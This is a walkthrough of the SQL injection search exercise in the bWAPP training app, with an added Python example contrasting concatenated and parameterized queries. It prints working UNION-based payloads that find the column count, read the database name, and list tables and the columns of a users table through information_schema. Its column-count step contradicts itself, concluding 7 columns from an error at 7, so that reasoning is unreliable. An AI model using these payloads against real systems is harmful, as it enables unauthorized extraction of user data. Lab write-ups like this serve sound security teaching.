SQL Injection (Search)
Security Level : Low
Typing "credible" in the search field gives us one entry : "The Incredible hulk" (It looks like bees are Marvel addicted)
So we can be pretty sure that the query is something like :
"Select col1,col2,col3 from mytable where movie LIKE '%". $userinput ."%'"
If the form is vulnerable, entering a single quote ( ' ) should throw a SQL error, because Select col1,col2,col3 from mytable where movie LIKE '%'%' is not a valid query : the injected quote closes the string early and leaves an unterminated one behind.
Good ! The form could be vulnerable.
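To make the point concrete from the defender's side, here is an added example (not bWAPP's code, which is PHP on MySQL; this is a Python stand-in on an in-memory SQLite table with constructed movie rows) showing the concatenated query the write-up infers next to a parameterized version. The vulnerable function reproduces the error a lone quote causes, and the safe function binds the search term as a parameter and escapes LIKE wildcards so the same input is matched literally instead of being parsed as SQL.

```python
import sqlite3

# Constructed sample rows standing in for the bWAPP "movies" table.
# Assumption: only the columns needed for the search are modelled here.
SAMPLE_MOVIES = [
    (1, "The Incredible Hulk", 2008),
    (2, "Iron Man", 2008),
    (3, "The Amazing Spider-Man", 2012),
]


def make_db():
    """Build a throwaway in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER, title TEXT, release_year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", SAMPLE_MOVIES)
    return conn


def search_vulnerable(conn, user_input):
    """The pattern the write-up infers: raw input spliced into the SQL text.
    A quote in the input changes the structure of the statement itself."""
    sql = ("SELECT id, title, release_year FROM movies "
           "WHERE title LIKE '%" + user_input + "%'")
    return [row[1] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    """Escape the LIKE metacharacters (% and _) and the escape char itself,
    so the user's text is matched literally inside the pattern."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def search_safe(conn, user_input):
    """Parameterized search: the wildcard pattern is built in Python and
    bound as a value, so the database never parses the input as SQL."""
    pattern = "%" + escape_like(user_input) + "%"
    sql = ("SELECT id, title, release_year FROM movies "
           "WHERE title LIKE ? ESCAPE '\\'")
    return [row[1] for row in conn.execute(sql, (pattern,))]


def probe(search, user_input):
    """Run a search function against a fresh database and report either
    ("ok", titles) or ("error", message), mirroring what the form shows."""
    conn = make_db()
    try:
        return ("ok", search(conn, user_input))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for term in ["credible", "'", "' order by 3 -- -"]:
        print(repr(term), "vulnerable:", probe(search_vulnerable, term))
        print(repr(term), "safe:      ", probe(search_safe, term))
```

Running it shows the three behaviours the write-up relies on: a normal term works in both versions, a lone quote errors only in the concatenated version, and the `' order by 3 -- -` probe from the write-up is obeyed as SQL by the vulnerable version but treated as a literal (matching nothing) by the parameterized one.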
Would you like to retrieve some user secrets from the database ?
Of course you do :), but before we have to know more : how many columns are returned ?
To find the answer we can use an ORDER BY clause inside our query : ' order by 3 -- -
The query sent to the database will be something like : Select col1,col2,col3 from mytable where movie LIKE '%' order by 3 -- -%' . The -- - comment discards the rest of the original query, so the result is ordered by the third column...if it exists ! Otherwise a SQL error is thrown, which tells us the query returns fewer columns than the number we tried.
First, we'll try with 7 columns.
Error ! So the query contains 7 columns !
We can now perform some evil queries, first find the current database :
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
We add "and 1=0" so that the original WHERE clause matches nothing and only the rows from our union all statement are returned.
As you can see, our database is called "bWAPP" (Of course we could have guessed it)
Is there a table called "users" in this beehive ???
Query : ' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -
Ohooo :) table 'users' exists.
What are the columns ?
Query : ' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -
OWASP Link : https://www.owasp.org/index.php/SQL_Injection